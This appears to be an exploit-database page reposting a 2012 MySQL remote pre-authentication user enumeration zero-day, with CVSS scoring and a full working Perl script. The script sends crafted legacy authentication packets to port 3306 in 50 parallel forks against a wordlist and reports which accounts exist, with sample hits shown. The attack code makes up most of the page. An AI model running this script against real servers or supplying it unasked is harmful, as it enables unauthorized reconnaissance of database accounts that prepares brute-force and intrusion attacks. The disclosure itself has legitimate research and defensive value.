MySQL Remote Preauth User Enumeration Zeroday

2012-12-02 / 2012-12-03
Credit: Kingcope
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# MySQL User Account Enumeration Utility # When an attacker authenticates using an incorrect password # with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server # the mysql server will respond with a different message than Access Denied, what makes # User Account Enumeration possible. # The Downside is that the attacker has to reconnect for each user enumeration attempt #20000 user accounts in 7 minutes #Mon Jan 16 09:00:18 UTC 2012 #Mon Jan 16 09:07:26 UTC 2012 #root@vs2067037:~# wc -l MEDIUM.LST #21109 MEDIUM.LST #A usernames.txt wordlist is included in this package #examples: #root@vs2067037:~# perl mysqlenum.pl host usernames.txt # #[*] HIT! -- USER EXISTS: administrator@host # #root@vs2067037:~# perl mysqlenum.pl host usernames.txt # #[*] HIT! -- USER EXISTS: admin@host # use IO::Socket; use Parallel::ForkManager; $|=1; if ($#ARGV != 1) { print "Usage: mysqlenumerate.pl <target> <wordlist>\n"; exit; } $target = $ARGV[0]; $wordlist = $ARGV[1]; $numforks = 50; $pm = new Parallel::ForkManager($numforks); open FILE,"<$wordlist"; unlink '/tmp/cracked'; @users = (); $k=0; while(<FILE>) { chomp; $_ =~ s/\r//g; $users[$k++] = $_; } close FILE; $k2 = 0; for(;;) { for ($k=0;$k<$numforks;$k++) { $k2++; if (($k2 > $#users) or (-e '/tmp/cracked')) { exit; } my $pid = $pm->start and next; $user = $users[$k2]; goto further; again: print "Connect Error\n"; further: my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '3306', Proto => 'tcp') || goto again; recv($sock, $buff, 1024, 0); $buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50". "\x4e\x5f\x51\x55\x45\x4d\x45\x00"; $buf = chr(length($buf)-3). $buf; print $sock $buf; $res = recv($sock, $buff, 1024, 0); close($sock); if ($k2 % 100 == 0) { print $buff."\n"; } if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;} unless (-e '/tmp/cracked') { open FILE, ">/tmp/cracked"; close FILE; print "\n[*] HIT! -- USER EXISTS: $user\@$target\n"; open FILE, ">jackpot"; print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n"; exit; } } $pm->wait_all_children; }

References:

http://seclists.org/fulldisclosure/2012/Dec/9


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top